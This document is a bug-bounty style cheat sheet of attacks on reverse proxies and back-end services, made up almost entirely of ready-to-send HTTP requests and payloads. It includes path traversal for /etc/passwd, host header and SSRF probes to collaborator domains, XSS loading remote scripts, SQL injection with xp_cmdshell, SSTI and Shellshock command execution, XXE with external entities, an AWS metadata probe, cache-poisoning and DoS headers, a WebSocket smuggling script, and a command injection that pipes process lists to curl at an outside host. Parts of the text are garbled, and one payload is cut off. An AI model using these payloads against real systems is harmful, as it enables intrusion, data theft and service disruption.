Attacking Secondary Context
Secondary Context in Web Applications
Secondary context refers to the different ways a web application can handle and process requests indirectly related to the main content. This often involves proxies, back-end servers, and intermediate services that might introduce additional security risks.
Identify Some " Hidden " Reverse HTTP Proxies
The heuristic rules used are the following :
A
502
status code is returned (RFC 2616, section 14.31)A
483
status code is returned (RFC 3261, section 8.1.1.6)When using TRACE, the body contains the '
X-Forwarded-For
' string'
Via
' or 'X-Via
' headers are detectedSome fields are different between hops :
HTTP status codes
'
Server
' headers'
Content
-Type' headers'
Via
' headersHTML titles
HTML '
address
' tags'
X-Forwarded-For
' values in body
Using HTTP-Traceroute.py tool.
Identify Routing Of HTTP Request
Does
/Endpoint-To-Proxy/../
Return Something Different Than/
Does
/Endpoint-To-Proxy/../
Return Headers Different Than/
Try To Inject Encode , Double OR Triple URL Encoding In Parameters
e.g. https://www.company.com/api/path?id=%23
#
%23
?
%3F
&
%26
/
%2F
@
%40
Try To Inject Encode , Double OR Triple URL Encoding These Payloads After URL
..%2f%23
..;/
..%00/
..%0d/
..%5c
..\
..%ff/
%2e%2e%2f
.%2e/
e.g. https://www.company.com/api/..%00/
Using OPTIONS Method for endpoint discovery
Using
OPTIONS
Method to identify other endpoints
Check PUT Method
Try To Change Request Method To
PUT
If You Got201 Created
Then There IsRCE
PUT /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com
// references
https://www.hackingarticles.in/multiple-ways-to-exploiting-put-method/
https://www.arridae.com/blogs/HTTP-PUT-method.php
https://asfiyashaikh.medium.com/exploiting-put-method-d2d0cd7ba662
Try To Append
.json
Extension To Your Endpointse.g. /endpoint-To-Proxy.json
To Get Sensitive Information -> Tweet
Smuggling via HTTP/2 Cleartext
Try To Figure Out Are There Endpoints Accept Establishing HTTP/2 Cleartext , If Yes Try To Smuggler It By Using Tool e.g. h2csmuggler
Steps to produce :-
1 - Collect All The Endpoints
2 - Put It In File Called e.g. url.txt
3 - Open Your Terminal
4 - Write This Command python3 h2csmuggler.py --scan-list url.txt --threads 5
Smuggling WebSockets
Smuggler Websocket Endpoints
import socket
req1 = '''GET /ُEndpoint-To-Proxy/ HTTP/1.1
Host: company.com
Sec-WebSocket-Version: 1337
Upgrade: websocket
'''.replace('\n', '\r\n')
req2 = '''GET /Internal-Endpoint HTTP/1.1
Host: localhost:PORT
'''.replace('\n', '\r\n')
def main(netloc):
host, port = netloc.split(':')
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, int(port)))
sock.sendall(req1)
sock.recv(4096)
sock.sendall(req2)
data = sock.recv(4096)
data = data.decode(errors='ignore')
print data
sock.shutdown(socket.SHUT_RDWR)
sock.close()
-----------------------------------------------------------------------------
Steps to produce :-
1 - Open Your Terminal
2 - Write This Command
python3 websocket-smuggler.py
XSS
XSS in Referrer
Referer: "><script src=//me.xss.ht></script>
If There Is Nginx As Reverse Proxy Try To Inject Blind XSS Payloads
GET /Endpoint-To-Proxy/%3D%22img
src='https://RandomString(10).id.burpcollaborator.net'%22%3E HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com
Connection: keep-alive
Try To Inject XSS Payloads After Your Endpoints
GET /Endpoint-To-Proxy/
"></script><svg onload=%26%2397%3B%26%23108%3B%26%23101
%3B%26%23114%3B%26%23116%3B(document.domain)> HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com
Connection: keep-alive
---------------------
// resources
https://medium.com/@saamux/reflected-xss-on-www-yahoo-com-9b1857cecb8c
https://medium.com/bugbountywriteup/900-xss-in-yahoo-recon-wins-65ee6d4bfcbd
https://medium.com/@saamux/filter-bypass-to-reflected-xss-on-https-finance-yahoo-com-mobile-version-22b854327b27
Host Header Injection
GET /Endpoint-To-Proxy HTTP/1.1
Host: RandomString(10).id.burpcollaborator.net
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com
Connection: keep-alive
-----------------------------------------------------------
// Ambiguate The Host Header
Host: company.com@RandomString(10).id.burpcollaborator.net
Host: company.com:@RandomString(10).id.burpcollaborator.net
Host: company.com:RandomString(10).id.burpcollaborator.net
Host: RandomString(10).id.burpcollaborator.net
Host: localhost
Host: company.com:PORT
----------------
Host: RandomString(10).id.burpcollaborator.net
X-Forwarded-Host: RandomString(10).id.burpcollaborator.net
---------------------
//Space-surrounded Host Header
Host: www.company.com
Host: RandomString(10).id.burpcollaborator.net
-------------------------
//Change Host Header To host Header
host: comapny.com
------------------------
// o Remove The Space That In The Host Header
Host:www.company.com
----------------
// Add Tab Instead Of The Space That In The Host Header
Host: www.company.com
----------------------------
Add / , : , \x00 , \x20 , \x09 , \xad After Value Of The Host Header
Host: www.company.com sensitive-file.txt
----------------------------------------
// Override The Host Header e.g. POST https://company.com
// AND Change Host Header e.g Host: RandomString(10).id.burpcollaborator.net
// To Get SSRF
GET https://company.com/Endpoint-To-Proxy HTTP/1.1
Host: RandomString(10).id.burpcollaborator.net
--------------------------------------
// Spoof The Original IP
GET /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
X-Forwarded-For: 0000::1
Source: https://hackerone.com/reports/44513
-------------------------------
GET /Endpoint-To-Proxy HTTP/1.0
Host: www.company.com
X-Forwarded-For: RandomString(10).id.burpcollaborator.net
Source: https://twitter.com/ADITYASHENDE17/status/1305723250413105152
----------------------------------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
X-Forwarded-For: 0177.1
Source: https://twitter.com/agarri_fr/status/965196958011920384
-----------------------------------------------------
// Other Bypasses
X-Forwarded-For: 127.0.0.1\r
X_Forwarded_For: 127.0.0.1
Forwarded: for=127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
X-Remote-User: admin
Referer: RandomString(10).id.burpcollaborator.net
Origin: https://RandomString(10).id.burpcollaborator.net
----------
Referer: RandomString(10).id.burpcollaborator.net
Referer: RandomString(10).id.burpcollaborator.net
Origin: https://RandomString(10).id.burpcollaborator.net
Origin: https://RandomString(10).id.burpcollaborator.net
--------------------------------------
# Inject Noun-Standard Headers
X-Forwarded-For: RandomString(10).id.burpcollaborator.net
X-Forwarded-Host: RandomString(10).id.burpcollaborator.net
X-Client-IP: RandomString(10).id.burpcollaborator.net
X-Originating-IP: RandomString(10).id.burpcollaborator.net
X-WAP-Profile: https://RandomString(10).id.burpcollaborator.net
True-Client-IP: RandomString(10).id.burpcollaborator.net
----------------------------------------------------------------------------
# Double Noun-Standard Headers
X-Forwarded-For: RandomString(10).id.burpcollaborator.net
X-Forwarded-For: RandomString(10).id.burpcollaborator.net
X-Forwarded-Host: RandomString(10).id.burpcollaborator.net
X-Forwarded-Host: RandomString(10).id.burpcollaborator.net
X-Client-IP: RandomString(10).id.burpcollaborator.net
X-Client-IP: RandomString(10).id.burpcollaborator.net
--------------------------------------------------
# Sources
https://zeronights.ru/wp-content/themes/zeronights-2019/public/materials/4_ZN2019_Morozov_SSRF.pdf
https://blog.paloaltonetworks.com/2019/10/cloud-kubernetes-vulnerabilities/
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For
https://speakerdeck.com/bo0om/at-home-among-strangers?slide=8
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Forwarded
https://www.slideshare.net/sergeybelove/attacking-thru-http-host-header
https://www.slideshare.net/ssusera0a306/offzone-another-waf-bypass
https://www.youtube.com/watch?v=zP4b3pw94s0
https://hackerone.com/reports/429617
https://medium.com/bugbountywriteup/identifying-escalating-http-host-header-injection-attacks-7586d0ff2c67
https://www.youtube.com/watch?v=zP4b3pw94s0
https://www.youtube.com/watch?v=V8f6gqrCbZU
https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet
Try To Change Routing Of The Request To Get SSRF
GET /Endpoint-To-Proxy@RandomString(10).id.burpcollaborator.net# HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com
Connection: keep-alive
-------------------------------------------------
GET @RandomString(10).id.burpcollaborator.net/Endpoint-To-Proxy HTTP/1.1
GET :@RandomString(10).id.burpcollaborator.net/Endpoint-To-Proxy HTTP/1.1
GET /Endpoint-To-Proxy:@RandomString(5).id.burpcollaborator.net# HTTP/1.0
GET /Endpoint-To-Proxy@RandomString(5).id.burpcollaborator.net# HTTP/1.0
----------------------------------------------
// resources
https://www.youtube.com/watch?v=zP4b3pw94s0
https://www.youtube.com/watch?v=gluSEBZpplQ
https://www.contextis.com/us/blog/server-technologies-reverse-proxy-bypass
Blind XSS or Time-Based SQLi in X-Forwarded-For header
"><script src=//me.xss.ht></script>
";WAITFOR DELAY '0.0.20'--
Blind XSS or QLI in User Agent
"><script src=//me.xss.ht></script>
'XOR(if(now()=sysdate(),sleep(30),0))OR'
User-Agent: Mozilla/5.0'XOR(if(now()=sysdate(),sleep(30),0))OR'
RCE in User Agent
User-Agent: { :;}; echo $(</etc/passwd)
Double Content-Type Header
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: multipart/form-data
Content-Type: application/json
Content-Length: Number
Origin: https://www.company.com
parameter=value
Invalid Content-Type Header
Content-Type: */*
Inject l5d-dtab Header
If There Is Linkerd Service Try To
Inject l5d-dtab
Headere.g. l5d-dtab: /$/inet/169.254.169.254/80
To GetAWS metadata
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
l5d-dtab: /$/inet/169.254.169.254/80
Content-Length: Number
Origin: https://www.company.com
parameter=value
Content-Length Header With Number And There Is Not Body Content To Expose Internal Information
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Content-Length: Number
Origin: https://www.company.com
Cache Poisoning and DOS
GET /Endpoint-To-Proxy HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
Host: RandomString(10).id.burpcollaborator.net
--------------------------
GET /Endpoint-To-Proxy HTTP/1.1
User-Agent: Mozilla/5.0
Host: RandomString(10).id.burpcollaborator.net
Host: company.com
----------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
X-Forwarded-Host: RandomString(10).id.burpcollaborator.net
--------------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
X-Forwarded-Host: www.company.com:PORT
--------------------------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
X-Forwarded-Host: www.company.com
X-Forwarded-Host: RandomString(10).id.burpcollaborator.net
-----------------------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
X-Forwarded-Server: RandomString(10).id.burpcollaborator.net
-------------------------------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Origin: null
X-Forwarded-Host: RandomString(10).id.burpcollaborator.net
----------------------------------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Origin: '-alert(1)-'
->https://www.youtube.com/watch?v=bDxYWGxuVqE
------------------------------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
X-Forwarded-Scheme: nothttps
X-Forwarded-Host: RandomString(10).id.burpcollaborator.net
-> https://www.youtube.com/watch?v=j2RrmNxJZ5c
--------------------------------------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
X-Host: RandomString(10).id.burpcollaborator.net
--------------------------------------------------
X-Host: RandomString(10).id.burpcollaborator.net
------------------
X-Oversized-Header-1: xxxxx 20K xxxx
X-Oversized-Header-2: xxxxx 20K xxxx
---------------------------
X-Metachar-Header: \n
-> https://cpdos.org/
--------------------------------------------------
X-HTTP-Method-Override: PUT
- https://blog.appsecco.com/aws-ec2-imdsv2-versus-an-esoteric-http-method-8bc1b9616ae8
- https://cpdos.org/
----------------------
X-Forwarded-Port: 123
- https://portswigger.net/research/responsible-denial-of-service-with-web-cache-poisoning
- https://hackerone.com/reports/409370
----------------------------------
X-Forwarded-SSL: off
- https://portswigger.net/research/responsible-denial-of-service-with-web-cache-poisoning
---------------------
Max-Forwards: 0
------------------------------
zTransfer-Encoding: xxxx
--------------
Accept_Encoding: xxxx
-------------------
Range: bytes=cow
-----------------------
User-Agent: xxxx 20K xxxx
------------------------
Try To Inject Keep-Alive , Transfer-Encoding , Trailer , Upgrade , Proxy-Authorization , TE
Connection OR Proxy-Authenticate e.g. Connection: close, Cookie To Abuse Hop-By-Hop
Connection: close, Cookie
- https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers
-----------------------------
Try To Inject ?%xx , %xx OR %xxx 20k xxx e.g. Endpoint-To-Proxy/%xx To
Do DOS Attack
GET /Endpoint-To-Proxy/%xxx 20k xxx HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
- https://hackerone.com/reports/500686
----------------------------
Try To Add Parameter With Value e.g. ?parameter=cache OR If There Is Parameters
Try To Add Another e.g. lang=en¶meter=cache To Achieve Cache Poisoning
GET /Endpoint-To-Proxy?parameter=cache HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
- https://www.youtube.com/watch?v=bDxYWGxuVqE
------------------------------------------------
Add Parameter With Large Value e.g. ?parameter=xxx 20K xxx
GET /Endpoint-To-Proxy?parameter=xxxx 20K xxxx HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
- https://www.youtube.com/watch?v=bDxYWGxuVqE
----------
GET /Endpoint-To-Proxy?_parameter=cache HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
- https://www.youtube.com/watch?v=bDxYWGxuVqE
;parameter=cache
--------------------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com
Connection: keep-alive
parameter=cache
_parameter=cache
LFI
If There Is Nginx As Reverse Proxy AND Weblogic As Backend Try To Use /#/../ To Change Route Of Endpoints
GET /Endpoint-To-Proxy/#/../../../../../../../../../../etc/passwd HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com
---------------------------------------
GET /../../../../../../../etc/passwd;/../Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
---------------------------------------
GET /Endpoint-To-Proxy../../../../../../../etc/passwd HTTP/1.1
Host: www.company.com
--------------------------------------------
GET /Endpoint-To-Proxy/..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
------------------------------------------
Try To Inject \..\.\..\.\..\.\..\.\..\.\..\.\Internal-Endpoint OR
\..\..\..\.\..\..\Internal-Endpoint\..\..\..\..\..\etc\passwd%3F.js
GET /Endpoint-To-Proxy\..\.\..\.\..\.\..\.\Internal-Endpoint HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
---------------------------------------------
Let’s Assume There Is Routing To Pulse Secure SSL VPN So ,
Try To Inject To Get File etc/hosts
GET /Endpoint-To-Proxy/dana-na/../dana/html5acc/guacamole/../
../../../../../etc/hosts?/dana/html5acc/guacamole/# HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
----------------------------------------------------
s Apache As Reverse Proxy Try To Use /..// To Change Route Of Endpoints
GET /Endpoint-To-Proxy/..//../../../../../../etc/passwd HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
--------------------------------------------------
If There Is Apache As Reverse Proxy Try To Use %3F To Bypass Blacklist Of
Endpoints
GET /Endpoint-To-Proxy/.git%3FAllowed HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
------------------------------------------------
If There Is Nginx As Reverse Proxy
AND Apache As Backend Try To Use //../ To Change Route Of Endpoints
GET /Endpoint-To-Proxy/../../../../../../../etc/passwd//../ HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
-------------------------------------------------------
If There Is Nginx As Reverse Proxy Try To Use ..;/ To Bypass Blacklist Of Endpoints
OR Bypass CORS
GET /Endpoint-To-Proxy/..;/../../../../../../etc/passwd HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
---------------------------------------
GET /../../../../etc/passwd/..;/Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
----------------------------------------
GeT /Endpoint-To-Proxy/../../../../../../etc/passwd HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
------------------------------------------
# If There Is Varnish As Reverse Proxy
GeT /Endpoint-To-Proxy/../../../../../../etc/passwd HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
------------------------------------------
# If There Is Haproxy OR Varnish As Reverse Proxy
GET http://company.com/Endpoints-To-Proxy/.git HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
-------------------------------------
RCE
Try To Change Method To POST And Add Body e.g. To Get RCE
POST /Endpoint-To-Proxy HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Content-Type":"application/x-www-form-urlencoded
Origin: https://www.company.com
Connection: keep-alive
<?php phpinfo(); ?>
RCE in Content-Type Header
Content-Type: %{#context['com.opensymphony.xwork2
.dispatcher.HttpServletResponse'].addHeader(Header,4*4)}.multip
art/form-data
SSTI
GET /Endpoint-To-Proxy/(${T(java.lang.Runtime).
getRuntime().exec('nslookup id.burpcollaborator.net')}) HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
SQLi
GET /Endpoint-To-Proxy/
'xor(if(mid(database(),1,1)=0x41,sleep(30),0))or HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
GET /Endpoint-To-Proxy/
'xor(if(mid(database(),1,1)=0x41,sleep(30),0))or HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
CRLF
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Origin: https://www.company.com
Content-Type: application/json
Content-Length: Number
{
"parameter":"value%0A%01%09Host:%20id.burpcollaborator.net"
}
Paameter Manipulation
Assume Backend Endpoint Take Value Of One Parameter As Path So Inject Encode , Double OR Triple URL Encoding ;@me.com , @me.com OR :@me.com To Get SSRF
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Origin: https://www.company.com
Content-Type: application/json
Content-Length: Number
{
"parameter":";@RandomString(10).id.burpcollaborator.net"
}
Assume Backend Endpoint Take Value Of One Parameter As Rewrite Configuration e.g.
rewrite ^.*$ $arg_parameter;
So Inject e.g. LFI Payloads To Get e.g.LFI
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Origin: https://www.company.com
Content-Type: application/json
Content-Length: Number
{ "parameter":"../../../../../../../../../../../../etc/passwd" }
RCE
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Origin: https://www.company.com
Content-Type: application/json
Content-Length: Number
{"parameter":"${nslookup id.burpcollaborator.net}"}
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Origin: https://www.company.com
Content-Type: application/json
Content-Length: Number
{
"parameter":"&nslookup me.com&'\"`0&nslookup me.com&`'"
}
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Origin: https://www.company.com
Content-Type: application/json
Content-Length: Number
{
"parameter":"0 -write |ps${IFS}aux|curl${IFS}http://me.com${IFS}-d${IFS}@-"
}
SQL Injection
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Origin: https://www.company.com
Content-Type: application/json
Content-Length: Number
{"parameter":"; DECLARE @command varchar(255); SELECT
@command='ping id.burpcollaborator.net'; EXEC
Master.dbo.xp_cmdshell @command; SELECT 1 as 'STEP'"}
Blind XSS
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
Content-Type: application/json
Content-Length: Number
{
"parameter":"</script><svg/onload='+/"/+/onmouseover=1/+(s=do
cument.createElement(/script/.source),s.stack=Error().stack,s.src
=(/,/+/RandomString(10).id.burpcollaborator.net/).slice(2),docume
nt.documentElement.appendChild(s))//'>"
}
XXE
If Body Of Request JSON Data , Try To Convert It XML With XXE Payloads
POST /Endpoint-To-Proxy/ HTTP/1.1
Host: www.company.com
Content-Type: application/xml
Content-Length: Number
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<parame
POST /Endpoint-To-Proxy/ HTTP/1.1
Host: www.company.com
Content-Type: application/xml
Content-Length: Number
<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/xml "href="http://RandomString(10).id.burpcollaborator.net/file.xsl"?>
<!DOCTYPE root PUBLIC "-//A/B/EN" http://RandomString(10).id.burpcollaborator.net/file.dtd [
<!ENTITY % remote SYSTEM "http://RandomString(10).id.burpcollaborator.net/path">
<!ENTITY xxe SYSTEM "http://RandomString(10).id.burpcollaborator.net/path">
%remote;
]>
<root>
<foo>&xxe;</foo>
<x xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:includehref="http://RandomString(10).id.burpcollaborator.net/" ></x>
<y xmlns=http://a.b/
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://a.b/
http:///RandomString(10).id.burpcollaborator.net/file.xsd">a</y>
</root>
RealWorld Examples

References
Last updated
Was this helpful?